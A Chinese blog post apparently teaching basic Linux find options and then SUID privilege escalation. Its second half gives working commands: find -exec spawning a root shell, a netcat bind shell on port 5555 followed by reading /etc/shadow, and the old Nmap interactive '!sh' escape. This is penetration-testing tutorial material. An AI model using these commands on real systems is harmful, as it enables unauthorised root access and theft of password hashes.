find基础命令与提权教程

find命令用来在指定目录下查找文件,若不指定目录则视为当前目录

  1. find常用参数

语法:find [path…] [expression]

path为查找路径,.为当前路径,/为根目录

expression即为参数

-name: 按文件名查找文件

-perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限

-user: 按照文件属主来查找

-size n: 文件大小是n个单位

-type:

  1. d:目录
  2. f:文件
  3. c:字符设备文件
  4. b:块设备文件

find实列

1.在当前目录下查找文件名以txt为后缀的文件

find -name '*.txt'

 

在root目录下查找大于50m小于100m的文件

find / -size +50M -size -100M -type f

 

查找权限为777的文件或目录并排序

find -perm -777 -type f |sort

 



find命令提权


1.使用find命令查看拥有suid权限的文件


find / -perm -u=s -type f 2>/dev/null




 使用find命令来提权


find text.sh -exec "/bin/sh" \;




如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。




 大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。


find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;


连接上去就会直接获取到一个Root权限的shell。


    

  1. 

    

    netcat 192.168.1.189 5555
    

    

    2. 

  2. 

     id
    

    3. 

  3. 

     cat /etc/shadow4
    

    4. 





 


 NMAP


较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell


nmap -V




 交互模式可以通过执行Nmap参数" interactive "(交互)




 以下命令将提供一个提升的shell


      

    1. 

      

      nmap> !sh
      

      

      2. 

    2. 

       sh-3.2# whoami
      

      3. 

    3. 

       root
      

      4. 



也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。


exploit/unix/local/setuid_nmap













            

            
posted @ 
2023-04-19 08:52 
西与洲 
阅读(1510) 
评论(0) 
 
收藏 
举报